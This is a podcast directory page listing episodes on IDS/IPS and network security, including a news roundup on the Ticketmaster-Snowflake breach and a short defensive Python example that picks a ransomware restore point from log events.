Podcasts about ids ips

  • 41 podcasts
  • 48 episodes
  • 44m avg. duration
  • 1 new episode monthly
  • Latest: Apr 11, 2025

Best podcasts about ids ips

Latest podcast episodes about ids ips

Packet Pushers - Heavy Networking
HN776: Security Platforms: Balancing Efficacy, Ops, and Emerging Threats (Sponsored)
Apr 11, 2025 | 49:33


Network security has evolved from stateful perimeter firewalls with maybe some IDS/IPS to a complex stack delivered as numerous unique tools, which often don’t talk to one another and may need to be operated by specialists. In this environment it’s hard to unify a security policy, troubleshoot problems, manage and operate tools, and respond effectively...

CISSP Cyber Training Podcast - CISSP Training Program
CCT 228: Secure Defaults and Domain 3 for the CISSP Exam (Domain 3.1.2)
Mar 17, 2025 | 36:12 | Transcription available


The cybersecurity landscape is constantly evolving, with even major corporations falling victim to devastating attacks. A recent UnitedHealthcare ransomware incident cost the company $22 million, with fingers pointing at leadership for allegedly appointing an unqualified CISO. This sobering reality highlights why defense in depth strategies aren't just theoretical concepts—they're essential protective measures for organizations of all sizes.

Defense in depth implements multiple security layers that work together like a medieval castle's defenses. When one layer fails, others remain to protect your assets. This approach serves two crucial functions: frustrating attackers enough that they move to easier targets, and creating trigger points that alert your team to potential breaches. From firewalls and IDS/IPS systems to role-based access controls and encryption, each layer contributes to a comprehensive security posture.

Beyond implementing multiple controls, we explore the critical concept of secure defaults—ensuring systems are configured securely from the moment they're deployed. Unfortunately, many products arrive with functionality prioritized over security, requiring security teams to implement proper configurations before deployment. This includes setting up strong password requirements, disabling unnecessary services, configuring automatic updates, and establishing proper network rules.

Balancing security with usability presents ongoing challenges. Each additional security layer adds complexity, impacts performance, and potentially frustrates users. The most effective security professionals find that sweet spot where protection is robust without driving users to circumvent controls. Documentation, regular reviews, and automated configuration management form the foundation of sustainable security practices.

Ready to enhance your security knowledge and prepare for your CISSP certification? Visit CISSPCyberTraining.com for my comprehensive blueprint and sign up for 360 free practice questions to help you pass your exam the first time.

Gain exclusive access to 360 FREE CISSP Practice Questions delivered directly to your inbox! Sign up at FreeCISSPQuestions.com and receive 30 expertly crafted practice questions every 15 days for the next 6 months—completely free! Don't miss this valuable opportunity to strengthen your CISSP exam preparation and boost your chances of certification success. Join now and start your journey toward CISSP mastery today!

Virtually Speaking Podcast
Achieving Zero Trust with VMware NSX Security and vDefend
Nov 26, 2024 | 14:04


In this episode of the Virtually Speaking Podcast, we're joined by Marc van de Logt, Technical Architect at PQR, to explore the latest advancements in VMware NSX Security. We dive into VMware vDefend, including its integration with NSX Firewalling, NAPP deployment using Avi Loadbalancer, and cutting-edge tools like Security Intelligence, NTA, IDS/IPS, and NDR. Marc also introduces VMware's Project Cypress and shares insights on how VMware vDefend supports organizations in implementing a robust zero trust architecture. Tune in to learn how these technologies can elevate your security strategy.

Inside the Network
Marty Roesch: Scaling Sourcefire and creating a new way to monetize open source security software
Jul 7, 2024 | 67:05 | Transcription available


In this episode, we sit down with Marty Roesch, founder of Sourcefire. Sourcefire led the intrusion detection and protection (IDS/IPS) wave, raised four rounds of financing from leading VCs like NEA, Sierra Ventures, and Sequoia, and went public, later to be acquired by Cisco for $2.7 billion.

Founders often believe that their first few customers cannot be large enterprises. Marty took the contrarian path. Sourcefire's first few customers were all six-figure deals - PWC, Intel, SAIC, and International Paper. In addition to that, Sourcefire was incredibly successful in working with industry research firms like Gartner and organizations like SANS in developing a new category. In this podcast, Marty shares what happened behind the scenes and provides founders with advice on how to work with enterprises and gain the interest of industry analysts.

Almost two decades after starting Sourcefire, Marty has gone back full circle to being the CEO of Netography, a network security startup. Marty shares stories from both his Sourcefire and Netography journeys, discusses how he navigated the M&A landscape and explains where we should be excited about AI in security, and where it's wise to be cautious.

The Daily Decrypt - Cyber News and Discussions
Key Takeaways from the Ticketmaster breach and Amazon re:Inforce in Philadelphia
Jun 13, 2024


In today's episode, we explore recent major cybersecurity upgrades aimed at safeguarding the American healthcare system, including a new initiative by Microsoft to provide critical cybersecurity resources to rural hospitals. Additionally, we delve into the Ticketmaster-Snowflake data breach perpetrated by ShinyHunters, targeting 560 million users and exposing key vulnerabilities in cloud environments. Lastly, we cover AWS's new and improved security features announced at the re:Inforce conference, which include added multi-factor authentication options, expanded malware protection for Amazon S3, and updated AI apps governance.

Read more at:
- https://www.helpnetsecurity.com/2024/06/12/american-healthcare-cybersecurity/
- https://thehackernews.com/2024/06/lessons-from-ticketmaster-snowflake.html
- https://www.helpnetsecurity.com/2024/06/12/aws-security-features/

Thanks to Jered Jones for providing the music for this episode. https://www.jeredjones.com/
Logo Design by https://www.zackgraber.com/

Tags: Microsoft, Cyberattacks, Healthcare systems, Rural hospitals, ShinyHunters, Breach, Data, Cybersecurity, AWS, FIDO2 passkeys, Malware protection, Cloud environment

Search Phrases:
- How Microsoft is protecting rural hospitals from cyberattacks
- Cybersecurity initiatives for rural healthcare by Microsoft
- ShinyHunters data breach impact on cloud security
- Essential measures to prevent cyberattacks in cloud environments
- Latest AWS security features from re:Inforce conference
- How FIDO2 passkeys enhance cloud environment security
- Updated malware protection for AWS S3 buckets
- Microsoft and Biden-Harris Administration cybersecurity efforts
- Impact of ShinyHunters breach on data security practices
- Advanced multi-factor authentication in AWS cloud environments

Major cybersecurity upgrades announced to safeguard American healthcare
https://www.helpnetsecurity.com/2024/06/12/american-healthcare-cybersecurity/
- Rising Threats: Cyberattacks on American healthcare systems soared 128% from 2022 to 2023, leading to significant disruptions in hospital operations and payment systems. Actionable Insight: Healthcare professionals should stay vigilant and ensure their organizations have updated cybersecurity measures to mitigate risks.
- Impact of Recent Attacks: In early 2024, a major cyberattack affected one-third of healthcare claims in the U.S., delaying payments and services. Critical Implication: Entry to mid-level cybersecurity professionals should focus on protecting payment systems and ensuring quick recovery plans are in place.
- Government Initiatives: The Biden-Harris Administration launched several initiatives to bolster healthcare cybersecurity, including a new gateway website and voluntary performance goals. Actionable Insight: Healthcare institutions should leverage these resources to enhance their cybersecurity posture.
- Collaboration for Solutions: In May 2024, the White House gathered industry leaders to discuss cybersecurity challenges and promote secure-by-design solutions. Engagement Suggestion: Ask listeners how their organizations collaborate with other entities to share threat intelligence and improve security.
- ARPA-H UPGRADE Program: The Advanced Research Projects Agency for Health introduced the UPGRADE program, investing over $50 million in tools to defend hospital IT environments. Actionable Insight: IT teams should explore participation in this program to access cutting-edge cybersecurity tools and support.
- Rural Hospital Support: Cyber disruptions severely impact rural hospitals. Leading tech companies, including Microsoft and Google, committed to providing free or discounted cybersecurity resources to these institutions. Critical Implication: Rural hospital IT staff should take advantage of these offers to strengthen their defenses against cyberattacks.
- Microsoft's Cybersecurity Program: Microsoft announced a program offering up to 75% discounts on security products, free cybersecurity assessments, and training for rural hospitals. Actionable Insight: Rural healthcare providers should engage with Microsoft's program to improve their cybersecurity measures and resilience.
- Google's Contributions: Google will offer endpoint security advice and discounted communication tools to rural hospitals, along with a pilot program to tailor security solutions to their needs. Engagement Suggestion: Prompt listeners to consider what specific cybersecurity challenges their rural hospitals face and how these new initiatives could assist them.
- Continued Efforts: The White House and industry leaders emphasize the importance of private-public partnerships to ensure the security and functionality of healthcare systems nationwide. Efficiency Tip: Cybersecurity professionals should stay informed about these partnerships and actively participate to benefit from shared knowledge and resources.

Lessons from the Ticketmaster-Snowflake Breach
https://thehackernews.com/2024/06/lessons-from-ticketmaster-snowflake.html
- ShinyHunters Breach: Last week, hacker group ShinyHunters allegedly stole 1.3 terabytes of data from 560 million Ticketmaster users. The breach could expose massive amounts of personal data and has sparked significant concern. Listener Question: How can we ensure our data is safe with such large-scale breaches happening? Actionable Insight: Regularly update passwords and enable multi-factor authentication (MFA) on all accounts.
- Live Nation Confirms Breach: Live Nation confirmed the breach in an SEC filing, stating unauthorized activity occurred in a third-party cloud database. An investigation is ongoing, and law enforcement is involved. Listener Question: What steps should companies take immediately after discovering a breach? Actionable Insight: Initiate a comprehensive investigation, notify affected parties, and work with law enforcement.
- Santander Also Affected: ShinyHunters claim to have data from Santander, affecting millions of customers and employees in Chile, Spain, and Uruguay. The breach involved a third-party provider. Listener Question: Should we be worried about third-party services? Actionable Insight: Ensure third-party services adhere to stringent security protocols and regularly review their security measures.
- Snowflake Connection: Both Ticketmaster and Santander used Snowflake for their cloud databases. Snowflake warned of increased cyber threats targeting customer accounts, urging users to review logs for unusual activity. Listener Question: What can companies do to safeguard their cloud data? Actionable Insight: Enforce MFA, set network policies to limit access, and regularly rotate credentials.
- Snowflake's Response: Snowflake's CISO clarified their system wasn't breached; single-factor authentication vulnerabilities were exploited. They recommend MFA and network policy rules for enhanced security.
- Mitiga's Research: Mitiga found the attacks exploited environments without two-factor authentication, primarily using commercial VPN IPs to execute attacks. Listener Question: How can we protect against these types of attacks? Actionable Insight: Implement and enforce MFA, utilize corporate SSO, and regularly monitor for unusual login activity.
- Cloud Security Challenges: Modern cloud environments limit some security controls. Ensure platforms offer APIs for privileged identity management and integrate with corporate security. Listener Question: What should we look for in a cloud service provider? Actionable Insight: Choose providers that support MFA, SSO, password rotation, and centralized logging.
- Non-Human Identities: Protecting non-human identities like service accounts is challenging but necessary. Snowflake provides guidance on securing these accounts. Listener Question: How do we secure non-human identities? Actionable Insight: Use strong, unique passwords and rotate credentials frequently for service accounts.
- Cost of Cyber Attacks: Cybercriminals aim to maximize profit through mass, automated attacks like credential stuffing. Simple security measures can make these attacks less feasible. Listener Question: What simple measures can we take to protect against cyber attacks? Actionable Insight: Implement SSO, MFA, and regular password rotation to increase the cost and complexity for attackers.

Remember, these insights are not just theoretical—they can help you strengthen your organization's security posture today!

AWS unveils new and improved security features
https://www.helpnetsecurity.com/2024/06/12/aws-security-features/
Key Information and Actionable Insights:
- Multi-Factor Authentication (MFA) Upgrades: New Option: AWS introduces support for FIDO2 passkeys as an additional MFA method. Security Assurance: FIDO2 security keys offer the highest level of security, ideal for environments with stringent regulatory requirements (FIPS-certified devices). Considerations: Evaluate passkey providers' security models, especially for access and recovery.
- Enhanced Access Management: IAM Access Analyzer Update: Now assists in identifying and removing unused roles, access keys, and passwords. Permissions Management: Helps set, verify, and refine unused permissions to maintain a streamlined and secure access environment.
- Malware Protection for Amazon S3: GuardDuty Expansion: Now detects malicious file uploads in S3 buckets. Configuration Options: Teams can set up post-scan actions like object tagging or use Amazon EventBridge to manage malware isolation processes.
- AI Apps Governance: Audit Manager Update: New AI best practice framework simplifies evidence collection and ongoing compliance audits. Standard Controls: Includes 110 pre-configured controls organized under domains such as accuracy, fairness, privacy, resilience, responsibility, safety, security, and sustainability.
- Additional Improvements: Log Analysis: Simplified through natural language queries that produce SQL queries (currently in preview). Network Services Integration: Streamlined process for incorporating firewalls, IDS/IPS, and other network services into customers' WANs.

Blue Security
Network Security 101
Jun 19, 2023 | 26:23


On this week's episode, Adam and Andy talk about the basics of network security. They go over asset management, firewalls, IDS/IPS, NDRs, and administrative access. If you're new to securing enterprise networks, listen in!

YouTube Video Link: https://youtu.be/ewwhQeyIRWs

Contact Us:
  Website: https://bluesecuritypod.com
  Twitter: https://twitter.com/bluesecuritypod
  LinkedIn: https://www.linkedin.com/company/bluesecpod
  YouTube: https://www.youtube.com/c/BlueSecurityPodcast
  Twitch: https://www.twitch.tv/bluesecuritypod

Andy Jaw:
  Mastodon: https://infosec.exchange/@ajawzero
  Twitter: https://twitter.com/ajawzero
  LinkedIn: https://www.linkedin.com/in/andyjaw/
  Email: andy@bluesecuritypod.com

Adam Brewer:
  Twitter: https://twitter.com/ajbrewer
  LinkedIn: https://www.linkedin.com/in/adamjbrewer/
  Email: adam@bluesecuritypod.com

Tech & Main Presents
Protecting Against The Known and Unknown | Aviv Grafi
May 8, 2023 | 19:04


Aviv Grafi is Founder and CTO of Votiro, an award-winning cybersecurity company that helps organizations accept safe content and data inbound, at scale, through Votiro's open, API-based content disarm and reconstruction-as-a-service technology. Aviv is the principal software architect for Votiro's enterprise solution, Votiro Cloud, which protects against known and unknown malware and ransomware in data, regardless of data source or destination. Prior to co-founding Votiro, Grafi served in an elite intelligence unit of the IDF, nurturing his passion for finding simple solutions to complex security issues. His areas of expertise span the cyber product lifecycle—from strategy and development through go-to-market—along with network security, IDS/IPS/firewall internals, defensive programming, enterprise security penetration testing, vulnerability research, and virtualization. For more information, visit https://www.linkedin.com/in/aviv-grafi-63426b1/ or https://votiro.com/.

Security Conversations
Down memory lane with Snort and Sourcefire creator Marty Roesch
Jul 25, 2022 | 67:34


Network security pioneer Marty Roesch takes listeners on a trip down memory lane, sharing stories from the creation of Snort back in the 1990s, the startup journey of building Sourcefire into an IDS/IPS powerhouse and selling the company for $2 billion, the U.S. government killing a Check Point acquisition, and his newest adventure as chief executive at Netography.

Ask Noah Show
Episode 294: Crowd Sourced Security with Philippe Humeau
Jul 13, 2022 | 53:52


Philippe Humeau joins us this hour to talk about CrowdSec - an IDS/IPS that uses crowdsourced information to evaluate threats on your network!

-- During The Show --

01:00 New Red Hat CEO Matt Hicks
  - New Red Hat CEO (https://www.redhat.com/en/about/press-releases/red-hat-names-matt-hicks-president-and-chief-executive-officer)

03:44 Remove all traces of a user on logout? - Wayne
  - TailsOS (https://tails.boum.org/)
  - Noah's hackish solution: TempFS? RamDisk? SquashFS?
  - 'Delete' isn't a thing (Inodes)
  - PhotoRec (https://www.cgsecurity.org/wiki/PhotoRec)

09:30 Recommendations for hosting provider - Gary
  - Gary's Site (https://www.shawanga.com/)
  - Host Gator
  - Self Host with Hugo
  - Tied to Hosting provider

14:00 Listener responds about CAD on Linux - Heath
  - FreeCAD (https://www.freecad.org/)
  - LibreCAD (https://librecad.org/)
  - TinkerCAD (https://www.tinkercad.com/)
  - Run under Wine

15:30 More Info about Steve's Solar? - Ian
  - Steve likes his EnPhase Solar (https://enphase.com/) setup
  - Hacks: Home Assistant Integration (https://github.com/briancmpbll/home_assistant_custom_envoy)

18:30 News Wire
  - Linux Better on i9 Systems - Ghacks (https://www.ghacks.net/2022/07/09/linux-is-performing-better-than-windows-11-according-to-this-benchmark-test/)
  - UltimateXR - XR Today (https://www.xrtoday.com/virtual-reality/ultimatexr-launches-free-open-source-unity-tool/)
  - EMQX 5.0 - EIN News (https://www.einnews.com/pr_news/580326713/emqx-5-0-released-the-ultra-scalable-open-source-mqtt-broker)
  - Calibre 6.0 - 9 to 5 Linux (https://9to5linux.com/calibre-6-0-released-with-full-text-search-arm64-support-on-linux-qt-6-port)
  - Budgie Desktop 10.6.2 - Buddies of Budgie (https://blog.buddiesofbudgie.org/budgie-10-6-2-released/)
  - Linux Mint 21 Beta - 9 to 5 Linux (https://9to5linux.com/linux-mint-21-beta-is-now-available-for-download-heres-a-first-look)
  - Debian GNU/Linux 11.4 - 9 to 5 Linux (https://9to5linux.com/debian-gnu-linux-11-4-bullseye-released-with-79-security-updates-and-81-bug-fixes)
  - Kali Linux on Linode - Help Net Security (https://www.helpnetsecurity.com/2022/07/11/linode-kali-linux/)
  - Paladin Cloud Security-as-Code - Virtualization Review (https://virtualizationreview.com/articles/2022/07/11/paladin-cloud.aspx)
  - Android Zero Day - XDA Developers (https://www.xda-developers.com/pixel-6-galaxy-s22-linux-kernel-vulnerability-root-android/)
  - OrBit Malware - Cyber Security News (https://cybersecuritynews.com/orbit-undetected-linux-malware/)

CrowdSec Interview
  - Philippe Ew-Mow from CrowdSec (https://www.crowdsec.net/)
  - What is CrowdSec
  - How CrowdSec works
  - Domains and Hashes vs IP Address and Behavior
  - How IPs are cleaned
  - Reporting based on "identity" not IP Address
  - IDS and IPS
  - CrowdSec Agent and CrowdSec Console
  - Open Source Cyber Threat Intelligence (CTI)
  - CrowdSec API
  - How does CrowdSec resolve IDS and IPS problems?
  - Blocking Unique Attacks
  - The 3 Tiers of CrowdSec
  - CrowdSec and GDPR
  - Using CrowdSec Bouncers (IPS)
  - CrowdSec Best Practices
  - Replay Mode
  - Integration into Firewalls
  - CrowdSec on OPNSense (https://www.crowdsec.net/blog/crowdsec-arrives-on-opnsense)
  - Best place to get started/learn: CrowdSec Docs (doc.crowdsec.net)

49:00 Thoughts on CrowdSec
  - Noah has been playing with CrowdSec
  - Can also identify and block malicious outgoing traffic

51:00 Interview with Matt Hicks
  - Interview with Matt Hicks (YouTube) (https://www.youtube.com/watch?v=qWg5cRH9YQg)

-- The Extra Credit Section --

For links to the articles and material referenced in this week's episode check out this week's page from our podcast dashboard! This Episode's Podcast Dashboard (http://podcast.asknoahshow.com/294)

Phone Systems for Ask Noah provided by Voxtelesys (http://www.voxtelesys.com/asknoah)

Join us in our dedicated chatroom #GeekLab:linuxdelta.com on Matrix (https://element.linuxdelta.com/#/room/#geeklab:linuxdelta.com)

-- Stay In Touch --

Find all the resources for this show on the Ask Noah Dashboard: Ask Noah Dashboard (http://www.asknoahshow.com)

Need more help than a radio show can offer? Altispeed provides commercial IT services and they're excited to offer you a great deal for listening to the Ask Noah Show. Call today and ask about the discount for listeners of the Ask Noah Show! Altispeed Technologies (http://www.altispeed.com/)

Contact Noah: live [at] asknoahshow.com

-- Twitter --

  - Noah - Kernellinux (https://twitter.com/kernellinux)
  - Ask Noah Show (https://twitter.com/asknoahshow)
  - Altispeed Technologies (https://twitter.com/altispeed)

Special Guest: Steve Ovens.

Ask Noah HD Video
Crowd Sourced Security with Philippe Humeau
Jul 12, 2022


Philippe Humeau joins us this hour to talk about CrowdSec - an IDS/IPS that uses crowd sourced information to evaluate threats on your network!

Control System Cyber Security Association International: (CS)²AI
41: Writing a Book to Leverage Your Expertise and Improve Your Career with Pascal Ackerman
Jun 7, 2022 | 50:40


Derek Harp is happy to welcome Pascal Ackerman as his guest for today's podcast! Pascal is a security professional focused on industrial control systems, and he's currently the Sr Security Consultant for Operational Technology - Threat & Attack Simulation at GuidePoint Security. He has a Master of Science degree in Electrical Engineering (MSEE/CE). He has had 18 years of experience in industrial Ethernet design and support, information and network security, risk assessments, pen-testing, forensics, and threat hunting, WAN/LAN/Internet and Wireless Technologies, Windows Environments, Unix, Linux, IIS, and Apache. He specialized in the architecture, engineering, and securing of plant-wide Ethernet networks using Purdue-model design strategies, IDS/IPS sensors, network monitoring, Security Information and Event Management (SIEM) solutions, next-gen firewalls, MS domain services, WSUS servers, MS SQL server clusters, etc.

Pascal was born and raised in the Netherlands. Right after leaving high school, he was put behind a POC by a company that sent him out across the world installing prototype machinery for filling machines. He is an engineer, programmer, gamer, hacker, traveler, tinkerer, pen-tester, and father.

In this episode of the (CS)²AI Podcast, he shares his superhero backstory and discusses his certifications, his education, and his career path. He also offers advice for those who would like to get into the field of cybersecurity and people thinking about writing a book. If you are considering a career in cybersecurity or if you are an engineer and want to specialize in cyber security, you will gain a lot from this podcast! Stay tuned for more!

Show highlights:
- After leaving college, Pascal stayed with the company where he did his internship. The company got him to set up a software simulation to test their POC programs and later put him on their commissioning team. (6:51)
- Pascal talks about what he did while working as a controls engineer. (8:08)
- How Pascal got invited to move to the US to continue with his work. (9:50)
- Pascal explains how many doors opened for him after presenting his first report in 2005. (12:27)
- Pascal talks about how security measures first intersected with his work in 2008-2009. (14:07)
- Pascal pinpoints the moment when he decided to change his career path. (16:00)
- Pascal offers advice for traditional engineers who want to improve what they do and join the cyber security workforce. (17:35)
- A Network Plus certification will help controls engineers understand the fundamentals of networking. (18:19)
- Pascal explains why he got hired as a commercial engineer in Network and Security at Rockwell. (21:16)
- Pascal talks about his book, Industrial Cybersecurity. (23:39)
- The book Hacking Exposed by Clint Bodungen inspired Pascal to write his first book. (27:50)
- How Threat GEN became a company based around a game Pascal developed. (29:10)
- Pascal offers advice on where people in IT who want to know more about safety, reliability, resiliency, and POCs can start. (32:36)
- The most successful companies have a combined IT and OT team with knowledgeable people on both sides. (36:43)
- Why do you need to figure out what you like the most and focus on that technology? (37:58)
- Architecture will be the next big step for monitoring everything. (45:06)
- Pascal discusses the process of writing his books and offers advice for those who would like to write a book. (45:49)

Links:
- https://www.cs2ai.org/ ((CS)²AI)
- https://www.linkedin.com/in/pascal-ackerman-036a867b/ (Pascal Ackerman on LinkedIn)
- https://www.amazon.com/Industrial-Cybersecurity-Efficiently-cybersecurity-environment/dp/1800202091 (Industrial Cybersecurity by Pascal Ackerman)

Books mentioned:
- https://www.amazon.com/Hacking-Exposed-Industrial-Control-Systems/dp/1259589714 (Hacking Exposed by Clint Bodungen)

Mentioned in this episode: Our Sponsors: We'd like to thank our sponsors for their faithful...

@BEERISAC: CPS/ICS Security Podcast Playlist
41: Writing a Book to Leverage Your Expertise and Improve Your Career with Pascal Ackerman
Jun 7, 2022 | 49:35


Podcast: Control System Cyber Security Association International: (CS)²AI
Episode: 41: Writing a Book to Leverage Your Expertise and Improve Your Career with Pascal Ackerman
Pub date: 2022-06-07

Derek Harp is happy to welcome Pascal Ackerman as his guest for today's podcast! Pascal is a security professional focused on industrial control systems, and he's currently the Managing Director of Threat Services at ThreatGEN. He has a Master of Science degree in Electrical Engineering (MSEE/CE). He has had 18 years of experience in industrial Ethernet design and support, information and network security, risk assessments, pen-testing, forensics, and threat hunting, WAN/LAN/Internet and Wireless Technologies, Windows Environments, Unix, Linux, IIS, and Apache. He specialized in the architecture, engineering, and securing of plant-wide Ethernet networks using Purdue-model design strategies, IDS/IPS sensors, network monitoring, Security Information and Event Management (SIEM) solutions, next-gen firewalls, MS domain services, WSUS servers, MS SQL server clusters, etc.

Pascal was born and raised in the Netherlands. Right after leaving high school, he was put behind a POC by a company that sent him out across the world installing prototype machinery for filling machines. He is an engineer, programmer, gamer, hacker, traveler, tinkerer, pen-tester, and father.

In this episode of the (CS)²AI Podcast, he shares his superhero backstory and discusses his certifications, his education, and his career path. He also offers advice for those who would like to get into the field of cybersecurity and people thinking about writing a book. If you are considering a career in cybersecurity or if you are an engineer and want to specialize in cyber security, you will gain a lot from this podcast! Stay tuned for more!

Show highlights:
- After leaving college, Pascal stayed with the company where he did his internship. The company got him to set up a software simulation to test their POC programs and later put him on their commissioning team. (6:51)
- Pascal talks about what he did while working as a controls engineer. (8:08)
- How Pascal got invited to move to the US to continue with his work. (9:50)
- Pascal explains how many doors opened for him after presenting his first report in 2005. (12:27)
- Pascal talks about how security measures first intersected with his work in 2008-2009. (14:07)
- Pascal pinpoints the moment when he decided to change his career path. (16:00)
- Pascal offers advice for traditional engineers who want to improve what they do and join the cyber security workforce. (17:35)
- A Network Plus certification will help controls engineers understand the fundamentals of networking. (18:19)
- Pascal explains why he got hired as a commercial engineer in Network and Security at Rockwell. (21:16)
- Pascal talks about his book, Industrial Cybersecurity. (23:39)
- The book Hacking Exposed by Clint Bodungen inspired Pascal to write his first book. (27:50)
- How Threat GEN became a company based around a game Pascal developed. (29:10)
- Pascal offers advice on where people in IT who want to know more about safety, reliability, resiliency, and POCs can start. (32:36)
- The most successful companies have a combined IT and OT team with knowledgeable people on both sides. (36:43)
- Why do you need to figure out what you like the most and focus on that technology? (37:58)
- Architecture will be the next big step for monitoring everything. (45:06)
- Pascal discusses the process of writing his books and offers advice for those who would like to write a book. (45:49)

Links: (CS)²AI; Pascal Ackerman on LinkedIn; Industrial Cybersecurity by Pascal Ackerman

Books mentioned: Hacking Exposed by Clint Bodungen

Data Center Therapy
#080 - Ransomware Preparedness with Quinton Barbe

Data Center Therapy

Play Episode Listen Later May 12, 2022 40:55


Cliched though it may be, it's true: it's not if you're going to experience a ransomware attack, it's just a matter of when. What can you do to prepare for it? Matt “It's 2022 but Backup is still Sexy” Yette and Matt “Trip this Wire” Cozzolino welcome back to the virtual studios, for the second time in a row, IVOXY's own Mr. Quinton Barber, Security Consultant, who counts acting as an Anti-Ransomware Specialist as one of his many responsibilities. Quinton and the Matts waste no time and begin to prescribe steps you can take to harden your environment, instrument your infrastructure, and shorten the time to restore when something happens to your data.

In this episode you, our loyal and proactive but ransomware-prone listeners, will get to hear about:
What aggregation of logs and the use of a SIEM mean to your business, and how they can inform your decision makers of when to restore from (known good backup points) in a Business Continuity event.
How long to set your log retention, both for compliance for your business and for forensics purposes for your infrastructure.
What the costs of business are, so to speak, when it comes to running the adjunct compute, storage, and networking you need to effectively monitor and alert on events.
How cutting-edge technologies like suspicious-activity snapshots from storage vendors are changing the way ransomware events are handled.

If phrases like event correlation, firewalls, IDS/IPS, and MDR garner your interest, this episode's going to be a great one for you. On the other hand, Quinton and your DCT hosts do their best to keep things very understandable and relatable if your ransomware concerns are there but your own knowledge of all those anti-ransomware tools needs augmentation. If you'd like to attend one of IVOXY's Security Roundtables, please reach out to your Account Manager and we'd be happy to help. If you enjoyed this episode, please be sure to like, share and subscribe wherever you found our quality podcast.
Lock it down and stay tuned for another exciting episode of Data Center Therapy! Thanks for listening!
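
The restore-point and log-retention questions the episode raises can be made concrete. The following is an added example, not material from Data Center Therapy or IVOXY: it runs over a handful of constructed events (a backup system's snapshot completions and a file server's rename events, with made-up names and message shapes that follow no vendor's log format), looks for a burst of renames to a ransom-style file suffix, picks the last snapshot that completed before that burst as the candidate known-good restore point, and checks whether a given retention period still covers the dwell time between the first indicator and detection. The suffix list, the burst threshold and the window are assumptions.

```python
"""Added example (not from the episode or IVOXY): choose a known-good restore
point and sanity-check log retention from aggregated events.

Everything below is constructed for illustration. The event tuples, the
"snapshot ... completed" and "rename a -> b" message shapes, and the ransom
suffixes are assumptions, not any vendor's log format.
"""
from datetime import datetime, timedelta

# Constructed events: (ISO timestamp, source, message). A SIEM would deliver
# these already normalised from the backup server, file servers and EDR.
SAMPLE_EVENTS = [
    ("2022-05-09T01:00:00", "backup", "snapshot fs01-daily-0509 completed"),
    ("2022-05-10T01:00:00", "backup", "snapshot fs01-daily-0510 completed"),
    ("2022-05-10T09:14:03", "fs01", "rename finance/q1.xlsx -> finance/q1.xlsx.locked"),
    ("2022-05-10T09:14:04", "fs01", "rename finance/q2.xlsx -> finance/q2.xlsx.locked"),
    ("2022-05-10T09:14:05", "fs01", "create finance/README_TO_RESTORE.txt"),
    ("2022-05-11T01:00:00", "backup", "snapshot fs01-daily-0511 completed"),
]

# Assumed ransom-style extensions; a real deployment would use a maintained list.
ENCRYPTED_SUFFIXES = (".locked", ".encrypted")


def parse(ts: str) -> datetime:
    return datetime.fromisoformat(ts)


def first_indicator(events, threshold=2, window_s=60):
    """Timestamp of the first burst of renames to a ransom-style suffix.

    One rename is noise; `threshold` of them inside `window_s` seconds is
    the (assumed) indicator. Returns None when no burst is present.
    """
    hits = [parse(ts) for ts, src, msg in sorted(events)
            if src != "backup" and msg.endswith(ENCRYPTED_SUFFIXES)]
    for i in range(len(hits) - threshold + 1):
        if (hits[i + threshold - 1] - hits[i]).total_seconds() <= window_s:
            return hits[i]
    return None


def last_good_snapshot(events, before: datetime):
    """Name of the last snapshot that completed strictly before `before`.

    A snapshot taken after the burst may already contain encrypted files,
    which is why the cut-off is the first indicator, not detection time.
    """
    best = None
    for ts, src, msg in sorted(events):
        if src == "backup" and msg.endswith("completed") and parse(ts) < before:
            best = msg.split()[1]
    return best


def restore_point(events):
    """Candidate known-good restore point, or None if nothing looks encrypted."""
    t0 = first_indicator(events)
    return None if t0 is None else last_good_snapshot(events, t0)


def retention_covers(events, retention_days: int, detected_at: str) -> bool:
    """True if logs from the first indicator are still inside the retention
    window at the moment of detection, i.e. forensics can see the start."""
    t0 = first_indicator(events)
    if t0 is None:
        return False
    return parse(detected_at) - t0 <= timedelta(days=retention_days)


if __name__ == "__main__":
    print("first indicator:", first_indicator(SAMPLE_EVENTS))
    print("restore from:", restore_point(SAMPLE_EVENTS))
    print("30-day retention covers dwell time:",
          retention_covers(SAMPLE_EVENTS, 30, "2022-05-12T10:00:00"))
```

The point of cutting off at the first indicator rather than at detection is that the 0511 snapshot, although it completed fine, was taken after the encryption started and is therefore not a safe restore target; the retention check is the same reasoning applied to logs instead of backups.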

Brakeing Down Security Podcast
SPONSOR-Blumira's Nato Riley on Log Classification, Security Maturity,

Brakeing Down Security Podcast

Play Episode Listen Later Nov 1, 2021 44:09


From Nato's email:
Hi Bryan,
Discussing the challenges that come with not having good logging in place could be a great topic!
We could make it partly about how security maturity works, in the idea that security generally starts with awareness and visibility.
The topic sort of gets into the idea that knowing is half the battle, so logging can be transformative for helping a company properly secure themselves from online risks!
What do you think of this topic idea?

https://www.blumira.com/careers/
https://thenewstack.io/logging-and-monitoring-why-you-need-both/
https://prometheus.io/
https://www.sentinelone.com/blog/the-10-commandments-of-logging/
https://towardsdatascience.com/why-should-you-care-about-logging-442a195b80a1
https://www.g2.com/products/blumira-automated-detection-response/reviews#survey-response-4908309

(wouldn't you know it… a couple additional google searches, and I find this -brbr)
https://www.executivegov.com/2021/08/omb-creates-maturity-framework-for-event-log-management/
https://insidecybersecurity.com/sites/insidecybersecurity.com/files/documents/2021/may/cs2021_0089c.pdf
Logging maturity in the US gov (OMB policy doc): https://www.whitehouse.gov/wp-content/uploads/2021/08/M-21-31-Improving-the-Federal-Governments-Investigative-and-Remediation-Capabilities-Related-to-Cybersecurity-Incidents.pdf

Are there examples of devices that don't give out logs? What if your vendor does not allow you to have logs? Can you create logs based on the activity of the device? What would that look like?

Types of logs:
Application logs
Network logs
Endpoint security logs
OS logs
IDS/IPS logs
Vuln scanner logs

TechVibe Radio
TechVibe Geek Out: Advanticom Details Its Active Threat Incident Response Team

TechVibe Radio

Play Episode Listen Later Aug 6, 2021 21:55


